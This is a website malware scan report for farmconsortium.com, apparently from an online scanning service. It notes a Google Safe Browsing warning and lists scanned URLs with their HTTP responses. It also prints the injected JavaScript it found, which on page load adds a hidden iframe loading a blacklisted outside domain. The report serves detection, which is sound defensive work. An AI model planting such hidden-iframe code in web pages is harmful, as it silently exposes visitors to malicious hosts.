Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=farmconsortium.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://farmconsortium.com/ | 200 OK Content-Length: 180800 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com
    if (document.loaded) {
        showBrowVer();
    } else {
        if (window.addEventListener) {
            window.addEventListener('load', showBrowVer, false);
        } else {
            window.attachEvent('onload', showBrowVer);
        }
    }
    function showBrowVer() {
        var divTag = document.createElement('div');
        divTag.id = 'dt';
        document.body.appendChild(divTag);
        var js_kod2 = document.createElement('iframe');
        js_kod2.src = 'http://24corp-shop.com';
        js_kod2.width = '180px';
        js_kod2.height = '200px';
        js_kod2.setAttribute('style', 'visibility:hidden');
        document.getElementById('dt').appendChild(js_kod2);
    }
Decoded script:
    function showBrowVer() {
        var divTag = document.createElement("div");
        divTag.id = "dt";
        document.body.appendChild(divTag);
        var js_kod2 = document.createElement("iframe");
        js_kod2.src = "http://24corp-shop.com";
        js_kod2.width = "180px";
        js_kod2.height = "200px";
        js_kod2.setAttribute("style", "visibility:hidden");
        document.getElementById("dt").appendChild(js_kod2);
    }
http://farmconsortium.com//j.maxmind.com/app/geoip.js/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://farmconsortium.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://pastebin.com/raw.php?i=VmZRdpjZ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 30 Jan 2015 18:34:32 GMT Location: /VmZRdpjZ Server: cloudflare-nginx Vary: Accept-Encoding Content-Type: text/plain; charset=utf-8 CF-RAY: 1b0fc39dd00c05c3-WAW Set-Cookie: __cfduid=de19ccb48d69d8a2c9eeaa1dc23916ac91422642871; expires=Sat, 30-Jan-16 18:34:31 GMT; path=/; domain=.pastebin.com; HttpOnly Set-Cookie: cookie_key=1; expires=Fri, 27-Feb-2015 18:34:32 GMT; Max-Age=2419200; path=/; domain=.pastebin.com Set-Cookie: realuser=1; expires=Sat, 31-Jan-2015 18:34:32 GMT; Max-Age=86400; path=/ X-Powered-By: PHP/5.5.5 | clean |
http://pastebin.com/vmzrdpjz | 404 Not Found Content-Length: 11774 Content-Type: text/html | clean |
http://pastebin.com/js/jquery.js | 200 OK Content-Length: 93433 Content-Type: application/x-javascript | clean |
http://pastebin.com/js/main_v1.js | 200 OK Content-Length: 8628 Content-Type: application/x-javascript | clean |
http://tags.expo9.exponential.com/tags/Pastebincom/Safe/tags.js | 200 OK Content-Length: 7393 Content-Type: application/x-javascript | clean |
http://pastebin.com/ | 200 OK Content-Length: 24822 Content-Type: text/html | clean |
http://pastebin.com/tools | 200 OK Content-Length: 44811 Content-Type: text/html | clean |
http://pastebin.com/api | 200 OK Content-Length: 41939 Content-Type: text/html | clean |
http://pastebin.com/archive | 200 OK Content-Length: 43806 Content-Type: text/html | clean |
http://tags.expo9.exponential.com/tags/Pastebincom/Unsure/tags.js | 200 OK Content-Length: 7393 Content-Type: application/x-javascript | clean |
http://pastebin.com/faq | 200 OK Content-Length: 23928 Content-Type: text/html | clean |
http://pastebin.com/trends | 200 OK Content-Length: 16761 Content-Type: text/html | clean |
http://pastebin.com/signup | 200 OK Content-Length: 15894 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: farmconsortium.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 18:34:27 GMT
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
X-Pingback: http://farmconsortium.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: farmconsortium.com
Referer: http://www.google.com/search?q=farmconsortium.com
Result:
The result is similar to the first query. There are no suspicious redirects found.